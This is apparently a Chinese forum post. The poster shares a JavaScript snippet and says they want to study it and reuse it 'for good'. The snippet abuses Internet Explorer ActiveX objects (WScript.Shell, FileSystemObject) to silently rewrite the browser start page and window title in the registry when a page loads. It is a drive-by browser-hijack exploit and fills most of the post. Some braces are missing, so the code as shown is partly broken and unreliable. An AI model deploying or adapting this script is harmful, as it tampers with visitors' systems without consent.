以下是修改注册表的代码,你说的网址是什么啊,俺想去看看,查看它的代码不久可以了!哈哈,为我所用,用于正途!岂不更好,省得总是被人黑,现在网站做的真差…………<SCRIPT language=JavaScript>
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f(){ 
try 

//ActiveX initialization 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
a1.createInstance(); 
FSO = a1.GetObject(); 
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Net = a1.GetObject(); try 

//if (document.cookie.indexOf("Chg") == -1) 

 
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","www.sina.com.cn");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "浏览器"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "浏览器"); 
var expdate = new Date((new Date()).getTime() + (1)); 
//document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" } 

catch(e) 
{}
}
catch(e) 
{}  

function init() 

setTimeout("f()", 1000); 

init();
 //-->
</script>